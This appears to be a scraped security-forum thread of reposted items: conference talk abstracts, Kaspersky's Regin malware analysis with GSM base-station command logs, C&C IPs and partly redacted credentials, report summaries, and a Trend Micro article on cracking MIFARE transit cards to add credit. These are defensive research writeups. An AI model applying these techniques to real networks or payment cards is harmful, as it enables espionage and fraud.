  14. [h=1]Adrien de Beaupre - Making Pen-Testing Analysis Sexy[/h] n-PUPDQ0H&index=6Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. This presentation will discuss information security penetration testing methodology, and how portions of the test process may be automated. The analysis of test results can be made more efficient through development of additional tools to assist the analyst. The Open Source Security Assessment Management System (OSSAMS) will be presented, which is a framework for the automation, data collection, analysis, and reporting in penetration testing and vulnerability assessment efforts. OSSAMS is written in Python and allows for the processing of tool results, parsing and normalizing the data, extraction of meaningful information via query, and more effective analysis. Adrien is a senior Information Security Consultant with Intru-Shun.ca Inc., experienced in penetration testing and incident response. He also holds the ISC2 CISSP, GXPN (GIAC Exploit Researcher and Advanced Penetration Tester), GWAPT (GIAC Web Application Penetration Tester), GPEN (GIAC Penetration Tester), GCIH (GIAC Certified Incident Handler), GCIA (GIAC Certified Intrusion Analyst), GSEC (GIAC Security Essentials), OPST (OSSTMM Professional Security Tester), and OPSA (OSSTMM Professional Security Analyst) certifications. As a volunteer member of the SANS Internet Storm Center (isc.sans.edu) he performs incident handling and threat analysis duties. When not geeking out Adrien can be found with his family, or at the dojo.
  15. [h=1]Michael Zapp - SSD Security Risks[/h] n-PUPDQ0H&index=7Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. Solid state storage devices provide many performance improvements but they also change how data is managed at the physical layer. Those changes lead to new opportunities for the extraction of sensitive data. This talk will outline how SSDs work, how they are managed, how this can be exploited, and what we can do to mitigate the risks. Michael is a Senior Instructor in the Department of Computer Science at the University of Manitoba. In addition to being the best Computer Science instructor around (opinions may differ), he has developed a number of vehicular embedded systems, including transmission controllers and instrument clusters. Michael also developed a go kart engine controller that receives commands via a custom designed handheld device, over a radio protocol of his own design.
  16. [h=1]Michael Legary - NFC & RFID Harvesting for REDACTED[/h] n-PUPDQ0H&index=8Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. Mike will discuss areas of experimentation and research for NFC and RFID harvesting including the best ways to make your own long range antennas for NFC reading, and the most interesting hardware builds that you can create to harvest data for close or wide range target applications. Physical hardware examples will be made available throughout the day for experimentation. Michael is an entrepreneur in the security industry who focuses on innovative approaches to building things that secure large enterprise. As a security practitioner, Michael spends his time on researching topics that impact security architecture, risk assessment and forensic procedure, working with folks across the globe to try making things better one day at a time.
  17. [h=1]Mark Jenkins - Auditable Offline Bitcoin Wallet Implementation[/h] n-PUPDQ0H&index=11Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. Motivations for operating an offline bitcoin wallet will be explained and security risks associated with obtaining and relying on such software will be examined. The practicality of performing software audits will be discussed, with the size of Armory's code as an example. A small, offline bitcoin wallet implementation will be demonstrated and auditability examined. The presentation will conclude with the potential useful role for self-programmable retro computers under more paranoid circumstances.
  18. [h=1]Richard Rodd & Chris Otto - USB: A Look Inside[/h] Publicat pe 24 nov. 2014 This talk was recorded at BSides Winnipeg 2013. More information can be found at BSides Winnipeg 2013. This talk will be an introduction to the USB protocol at the packet level, leading into an overview of a hardware device that sniffs the USB data of a connection by sitting on the wire between the two endpoints - host and device. Also covered will be the analysis of a USB device through PCAP analysis. Richard has his P. Eng., and is an instructor at the University of Manitoba's School of Medical Rehabilitation. While his courses and research are primarily in the field of assistive technology, information security and reverse engineering have been of interest to him since his early days of programming on the TRS-80, Commodore VIC-20, and Apple IIe. Chris is a senior developer at Novra Technologies in Winnipeg. He has over 15 years of experience, both personal and professional, designing and developing various systems and products ranging from embedded controllers and interfaces, mobile Android application development, to developing parts of DB2.
  19. Link: https://nsa.gov1.info/dni/nsa-ant-catalog/index.html
  20. L-am descarcat si ma uit peste el. Pare scris cu picioarele. Un jeg. Dar il testam si daca pare ok il lasam.
  21. Regin: Nation-state ownage of GSM networks "Beware of Regin, the master! His heart is poisoned. He would be thy bane..." By GReAT on November 24, 2014. 2:00 pm Incidents Research GReAT Kaspersky Labs' Global Research & Analysis Team @e_kaspersky/great Motto: "Beware of Regin, the master! His heart is poisoned. He would be thy bane..." "The Story of Siegfried" by James Baldwin Introduction, history Download our full Regin paper (PDF). In the spring of 2012, following a Kaspersky Lab presentation on the unusual facts surrounding the Duqu malware, a security researcher contacted us and mentioned that Duqu reminded him of another high-end malware incident. Although he couldn't share a sample, the third-party researcher mentioned the "Regin" name, a malware attack that is now dreaded by many security administrators in governmental agencies around the world. For the past two years, we've been tracking this most elusive malware across the world. From time to time, samples would appear on various multi-scanner services, but they were all unrelated to each other, cryptic in functionality and lacking context. It's unknown exactly when the first samples of Regin were created. Some of them have timestamps dating back to 2003. The victims of Regin fall into the following categories: Telecom operators Government institutions Multi-national political bodies Financial institutions Research institutions Individuals involved in advanced mathematical/cryptographical research So far, we've observed two main objectives from the attackers: Intelligence gathering Facilitating other types of attacks While in most cases, the attackers were focused on extracting sensitive information, such as e-mails and documents, we have observed cases where the attackers compromised telecom operators to enable the launch of additional sophisticated attacks. More about this in the GSM Targeting section below. 
Perhaps one of the most publicly known victims of Regin is Jean Jacques Quisquater (https://en.wikipedia.org/wiki/Jean-Jacques_Quisquater), a well-known Belgian cryptographer. In February 2014, Quisquater announced he was the victim of a sophisticated cyber intrusion incident. We were able to obtain samples from the Quisquater case and confirm they belong to the Regin platform. Another interesting victim of Regin is a computer we are calling "The Magnet of Threats". This computer belongs to a research institution and has been attacked by Turla, Mask/Careto, Regin, Itaduke, Animal Farm and some other advanced threats that do not have a public name, all co-existing happily on the same computer at some point. Initial compromise and lateral movement The exact method of the initial compromise remains a mystery, although several theories exist, which include man-in-the-middle attacks with browser zero-day exploits. For some of the victims, we observed tools and modules designed for lateral movement. So far, we have not encountered any exploits. The replication modules are copied to remote computers by using Windows administrative shares and then executed. Obviously, this technique requires administrative privileges inside the victim's network. In several cases, the infected machines were also Windows domain controllers. Targeting of system administrators via web-based exploits is one simple way of achieving immediate administrative access to the entire network. The Regin platform In short, Regin is a cyber-attack platform which the attackers deploy in the victim networks for ultimate remote control at all possible levels. The platform is extremely modular in nature and has multiple stages. Regin platform diagram The first stage ("stage 1") is generally the only executable file that will appear in victims' systems. Further stages are stored either directly on the hard drive (for 64 bit systems), as NTFS Extended Attributes or registry entries. 
We've observed many different stage 1 modules, which sometimes have been merged with public sources to achieve a type of polymorphism, complicating the detection process. The second stage has multiple purposes and can remove the Regin infection from the system if instructed so by the 3rd stage. The second stage also creates a marker file that can be used to identify the infected machine. Known filenames for this marker are: %SYSTEMROOT%\system32\nsreg1.dat %SYSTEMROOT%\system32\bssec3.dat %SYSTEMROOT%\system32\msrdc64.dat Stage 3 exists only on 32 bit systems - on 64 bit systems, stage 2 loads the dispatcher directly, skipping the third stage. Stage 4, the dispatcher, is perhaps the most complex single module of the entire platform. The dispatcher is the user-mode core of the framework. It is loaded directly as the third stage of the 64-bit bootstrap process or extracted and loaded from the VFS as module 50221 as the fourth stage on 32-bit systems. The dispatcher takes care of the most complicated tasks of the Regin platform, such as providing an API to access virtual file systems, basic communications and storage functions as well as network transport sub-routines. In essence, the dispatcher is the brain that runs the entire platform. A thorough description of all malware stages can be found in our full technical paper. Virtual File Systems (32/64-bit) The most interesting code from the Regin platform is stored in encrypted file storages, known as Virtual File Systems (VFSes). During our analysis we were able to obtain 24 VFSes, from multiple victims around the world. Generally, these have random names and can be located in several places in the infected system. For a full list, including format of the Regin VFSes, see our technical paper. Unusual modules and artifacts With high-end APT groups such as the one behind Regin, mistakes are very rare. Nevertheless, they do happen. 
Some of the VFSes we analyzed contain words which appear to be the respective codenames of the modules deployed on the victim: legspinv2.6 and LEGSPINv2.6 WILLISCHECKv2.0 HOPSCOTCH Another module we found, which is a plugin type 55001.0 references another codename, which is U_STARBUCKS: GSM Targeting The most interesting aspect we found so far about Regin is related to an infection of a large GSM operator. One VFS encrypted entry we located had internal id 50049.2 and appears to be an activity log on a GSM Base Station Controller. From https://en.wikipedia.org/wiki/Base_station_subsystem According to the GSM documentation (http://www.telecomabc.com/b/bsc.html): "The Base Station Controller (BSC) is in control of and supervises a number of Base Transceiver Stations (BTS). The BSC is responsible for the allocation of radio resources to a mobile call and for the handovers that are made between base stations under his control. Other handovers are under control of the MSC." Here's a look at the decoded Regin GSM activity log: This log is about 70KB in size and contains hundreds of entries like the ones above. It also includes timestamps which indicate exactly when the command was executed. The entries in the log appear to contain Ericsson OSS MML (Man-Machine Language as defined by ITU-T) commands. 
Here's a list of some commands issued on the Base Station Controller, together with some of their timestamps: 2008-04-25 11:12:14: rxmop:moty=rxotrx; 2008-04-25 11:58:16: rxmsp:moty=rxotrx; 2008-04-25 14:37:05: rlcrp:cell=all; 2008-04-26 04:48:54: rxble:mo=rxocf-170,subord; 2008-04-26 06:16:22: rxtcp:MOty=RXOtg,cell=kst022a; 2008-04-26 10:06:03: IOSTP; 2008-04-27 03:31:57: rlstc:cell=pty013c,state=active; 2008-04-27 06:07:43: allip:acl=a2; 2008-04-28 06:27:55: dtstp:DIP=264rbl2; 2008-05-02 01:46:02: rlstp:cell=all,state=halted; 2008-05-08 06:12:48: rlmfc:cell=NGR035W,mbcchno=83&512&93&90&514&522,listtype=active; 2008-05-08 07:33:12: rlnri:cell=NGR058y,cellr=ngr058x; 2008-05-12 17:28:29: rrtpp:trapool=all; [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 6 7 8 9 10 11 12 13 [/TD] [TD=class: crayon-code]2008-04-25 11:12:14: rxmop:moty=rxotrx; 2008-04-25 11:58:16: rxmsp:moty=rxotrx; 2008-04-25 14:37:05: rlcrp:cell=all; 2008-04-26 04:48:54: rxble:mo=rxocf-170,subord; 2008-04-26 06:16:22: rxtcp:MOty=RXOtg,cell=kst022a; 2008-04-26 10:06:03: IOSTP; 2008-04-27 03:31:57: rlstc:cell=pty013c,state=active; 2008-04-27 06:07:43: allip:acl=a2; 2008-04-28 06:27:55: dtstp:DIP=264rbl2; 2008-05-02 01:46:02: rlstp:cell=all,state=halted; 2008-05-08 06:12:48: rlmfc:cell=NGR035W,mbcchno=83&512&93&90&514&522,listtype=active; 2008-05-08 07:33:12: rlnri:cell=NGR058y,cellr=ngr058x; 2008-05-12 17:28:29: rrtpp:trapool=all;[/TD] [/TR] [/TABLE] Descriptions for the commands: rxmop - check software version type; rxmsp - list current call forwarding settings of the Mobile Station; rlcrp - list off call forwarding settings for the Base Station Controller; rxble - enable (unblock) call forwarding; rxtcp - show the Transceiver Group of particular cell; allip - show external alarm; dtstp - show DIgital Path (DIP) settings (DIP is the name of the function used for supervision of the connected PCM (Pulse Code Modulation) lines); rlstc - activate cell(s) in the GSM 
network; rlstp - stop cell(s) in the GSM network; rlmfc - add frequencies to the active broadcast control channel allocation list; rlnri - add cell neighbour; rrtpp - show radio transmission transcoder pool details; The log seems to contain not only the executed commands but also usernames and passwords of some engineering accounts: sed[snip]:Alla[snip] hed[snip]:Bag[snip] oss:New[snip] administrator:Adm[snip] nss1:Eric[snip] In total, the log indicates that commands were executed on 136 different cells. Some of the cell names include "prn021a, gzn010a, wdk004, kbl027a, etc...". The command log we obtained covers a period of about one month, from April 25, 2008 through May 27, 2008. It is unknown why the commands stopped in May 2008 though; perhaps the infection was removed or the attackers achieved their objective and moved on. Another explanation is that the attackers improved or changed the malware to stop saving logs locally and that's why only some older logs were discovered. Communication and C&C The C&C mechanism implemented in Regin is extremely sophisticated and relies on communication drones deployed by the attackers throughout the victim networks. Most victims communicate with another machine in their own internal network, through various protocols, as specified in the config file. These include HTTP and Windows network pipes. The purpose of such a complex infrastructure is to achieve two goals: give attackers access deep into the network, potentially bypassing air gaps and restrict as much as possible the traffic to the C&C. 
Here's a look at the decoded configurations: 17.3.40.101 transport 50037 0 0 y.y.y.5:80 ; transport 50051 217.y.y.yt:443 17.3.40.93 transport 50035 217.x.x.x:443 ; transport 50035 217.x.x.x:443 50.103.14.80 transport 27 203.199.89.80 ; transport 50035 194.z.z.z:8080 51.9.1.3 transport 50035 192.168.3.3:445 ; transport 50035 192.168.3.3:9322 18.159.0.1 transport 50271 DC ; transport 50271 DC [TABLE=class: crayon-table] [TR=class: crayon-row] [TD=class: crayon-nums] 1 2 3 4 5 [/TD] [TD=class: crayon-code]17.3.40.101 transport 50037 0 0 y.y.y.5:80 ; transport 50051 217.y.y.yt:443 17.3.40.93 transport 50035 217.x.x.x:443 ; transport 50035 217.x.x.x:443 50.103.14.80 transport 27 203.199.89.80 ; transport 50035 194.z.z.z:8080 51.9.1.3 transport 50035 192.168.3.3:445 ; transport 50035 192.168.3.3:9322 18.159.0.1 transport 50271 DC ; transport 50271 DC[/TD] [/TR] [/TABLE] In the above table, we see configurations extracted from several victims that bridge together infected machines in what appears to be virtual networks: 17.3.40.x, 50.103.14.x, 51.9.1.x, 18.159.0.x. One of these routes reaches out to the "external" C&C server at 203.199.89.80. The numbers right after the "transport" indicate the plugin that handles the communication. These are in our case: 27 - ICMP network listener using raw sockets 50035 - Winsock-based network transport 50037 - Network transport over HTTP 50051 - Network transport over HTTPS 50271 - Network transport over SMB (named pipes) The machines located on the border of the network act as routers, effectively connecting victims from inside the network with C&Cs on the internet. After decoding all the configurations we've collected, we were able to identify the following external C&Cs. 
[TABLE=width: 80%] [TR] [TD=width: 30%, align: center]C&C server IP[/TD] [TD=width: 35%, align: center]Location[/TD] [TD=width: 35%, align: center]Description[/TD] [/TR] [TR] [TD]61.67.114.73[/TD] [TD]Taiwan, Province Of China Taichung[/TD] [TD]Chwbn[/TD] [/TR] [TR] [TD]202.71.144.113[/TD] [TD]India, Chetput[/TD] [TD]Chennai Network Operations (team-m.co)[/TD] [/TR] [TR] [TD]203.199.89.80[/TD] [TD]India, Thane[/TD] [TD]Internet Service Provider[/TD] [/TR] [TR] [TD]194.183.237.145[/TD] [TD]Belgium, Brussels[/TD] [TD]Perceval S.a.[/TD] [/TR] [/TABLE] One particular case includes a country in the Middle East. This case was mind-blowing so we thought it's important to present it. In this specific country, all the victims we identified communicate with each other, forming a peer-to-peer network. The P2P network includes the president's office, a research center, educational institution network and a bank. These victims spread across the country are all interconnected to each other. One of the victims contains a translation drone which has the ability to forward the packets outside of the country, to the C&C in India. This represents a rather interesting command-and-control mechanism, which is guaranteed to raise very little suspicions. For instance, if all commands to the president's office are sent through the bank's network, then all the malicious traffic visible for the president's office sysadmins will be only with the bank, in the same country. Victim Statistics Over the past two years, we collected statistics about the attacks and victims of Regin. These were aided by the fact that even after the malware is uninstalled, certain artifacts are left behind which can help identify an infected (but cleaned) system. For instance, we've seen several cases where the systems were cleaned but the "msrdc64.dat" infection marker was left behind. 
So far, victims of Regin were identified in 14 countries: Algeria Afghanistan Belgium Brazil Fiji Germany Iran India Indonesia Kiribati Malaysia Pakistan Russia Syria In total, we counted 27 different victims, although it should be pointed out that the definition of a victim here refers to a full entity, including their entire network. The number of unique PCs infected with Regin is of course much, much higher. From the map above, Fiji and Kiribati are unusual, because we rarely see such advanced malware in such remote, small countries. In particular, the victim in Kiribati is most unusual. To put this into context, Kiribati is a small island in the Pacific, with a population around 100,000. More information about the Regin victims is available through Kaspersky Intelligent Services. Contact: intelreports@kaspersky.com Attribution Considering the complexity and cost of Regin development, it is likely that this operation is supported by a nation-state. While attribution remains a very difficult problem when it comes to professional attackers such as those behind Regin, certain metadata extracted from the samples might still be relevant. As this information could be easily altered by the developers, it's up to the reader to attempt to interpret this: as an intentional false flag or a non-critical indicator left by the developers. More information about Regin is available to Kaspersky Intelligent Services' clients. Contact: intelreports@kaspersky.com Conclusions For more than a decade, a sophisticated group known as Regin has targeted high-profile entities around the world with an advanced malware platform. As far as we can tell, the operation is still active, although the malware may have been upgraded to more sophisticated versions. The most recent sample we've seen was from a 64-bit infection. This infection was still active in the spring of 2014. 
The name Regin is apparently a reversed "In Reg", short for "In Registry", as the malware can store its modules in the registry. This name and detections first appeared in anti-malware products around March 2011. From some points of view, the platform reminds us of another sophisticated malware: Turla. Some similarities include the use of virtual file systems and the deployment of communication drones to bridge networks together. Yet through their implementation, coding methods, plugins, hiding techniques and flexibility, Regin surpasses Turla as one of the most sophisticated attack platforms we have ever analysed. The ability of this group to penetrate and monitor GSM networks is perhaps the most unusual and interesting aspect of these operations. In today's world, we have become too dependent on mobile phone networks which rely on ancient communication protocols with little or no security available for the end user. Although all GSM networks have mechanisms embedded which allow entities such as law enforcement to track suspects, there are other parties which can gain this ability and further abuse them to launch other types of attacks against mobile users. Full technical paper with IOCs. Kaspersky products detect modules from the Regin platform as: Trojan.Win32.Regin.gen and Rootkit.Win32.Regin. If you detect a Regin infection in your network, contact us at: intelservices@kaspersky.com Sursa: Regin: Nation-state ownage of GSM networks - Securelist
  22. Understanding Crypto-Ransomware Table of Contents Executive Summary 3 Introduction 4 Dataset and Timeline 6 Analysis Methodology 8 Results 11 Droppers, anti-analysis and persistence 11 C&C communication 13 Encryption 15 Targeted file types 17 Payment options 20 Implementation, flaws and version evolution 22 Conclusion 24 References 26 Appendix A: Fake Cryptolocker C&C Server 28 and CryptDecrypt Hook Appendix B: Fake Cryptowall C&C Server 30 Appendix C: Hooking WriteProcessMemory 32 About Bromium 35 Download: http://www.bromium.com/sites/default/files/bromium-report-ransomware.pdf
  23. Hacking RFID Payment Cards Made Possible with Android App 2:03 am (UTC-7) | by Veo Zhang (Mobile Threats Analyst) We recently encountered a high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits. What is the mechanism behind this, and what is the security risk of RFID payment cards in general? Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits. Security Issues with RFID Cards Because it is widely used, it’s no surprise that that RFID cards have become targeted by attacks. Take for instance the recent Tarjeta bip! card hacking incident in Chile. These cards are MIFARE-based smartcards; MIFARE refers to a family of chips widely used in contactless smart cards and proximity cards. Figure 1. MIFARE devices Looking at the code of the Android app, we found that if it runs on a device equipped with NFC it can read and write to these cards. The malicious app writes predefined data onto the card, raising the user’s balance to 10,000 Chilean pesos (approximately 15 US dollars). This particular trick will only work with this particular fare card, since it relies on the format of the card in question. How was the tool’s author able to rewrite the card’s information despite not having the correct authentication keys? This is because these cards are based on an older version of the MIFARE series of cards (MIFARE Classic), which is known to have multiple security problems. An attacker is able to clone or modify a MIFARE Classic card in under 10 seconds, and the equipment (such as the Proxmark3), together with any needed support, is sold online. Figure 2. Proxmark3 for sale Using widely available tools, the attacker cracked the card’s authentication key. 
With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app. Figure 3. Manufacturer and memory content of a MIFARE Classic card Attacks on other kinds of MIFARE cards (specifically, MIFARE DESFire and MIFARE Ultralight) are known to exist. We know of at least three vulnerable cards which we have: a social security card with banking service, a payment card for transportation and shopping, and a dining card. The social security card has approximately seven million users. Figure 4. MIFARE DESFire-based social security card The dining card uses MIFARE Classic cards, and our testing revealed the on-card credits can be manipulated. The two other cards are MIFARE DESFire cards, which are vulnerable to side-channel attacks. The cryptosystems in these cards leak information if the power used is monitored; the keys can be recovered within seven hours. If the issued keys are not random, customer cards can be cloned or manipulated similarly to MIFARE Classic cards. Or even worse, credits can also be manipulated within a NFC-enabled mobile device. Conclusion These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk. NFC We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk; in the past we have provided tips both to end users and businesses on how to use NFC safely. Sursa: Hacking RFID Payment Cards Made Possible with Android App | Security Intelligence Blog | Trend Micro
  24. Regin: Top-tier espionage tool enables stealthy surveillance Symantec Security Response Version 1.0 – November 24, 2014 OVERVIEW...................................................................... 3 Introduction................................................................... 5 Timeline.......................................................................... 5 Target profile.................................................................. 6 Infection vector........................................................ 6 Architecture................................................................... 8 Stage 0 (dropper)..................................................... 9 Stage 1...................................................................... 9 Stage 2...................................................................... 9 Stage 3...................................................................... 9 Stage 4............................................................ 11 Stage 5.................................................................... 11 Encrypted virtual file system containers ?????????????? 11 Command-and-control operations......................... 12 Logging................................................................... 12 Payloads....................................................................... 14 64-bit version............................................................... 15 File names.............................................................. 15 Stage differences................................................... 15 Conclusion.................................................................... 16 Protection..................................................................... 16 Appendix...................................................................... 18 Data files................................................................ 18 Indicators of compromise............................................ 
20 File MD5s................................................................ 20 File names/paths.................................................... 20 Extended attributes............................................... 21 Registry.................................................................. 21 Download: http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/regin-analysis.pdf
×
×
  • Create New...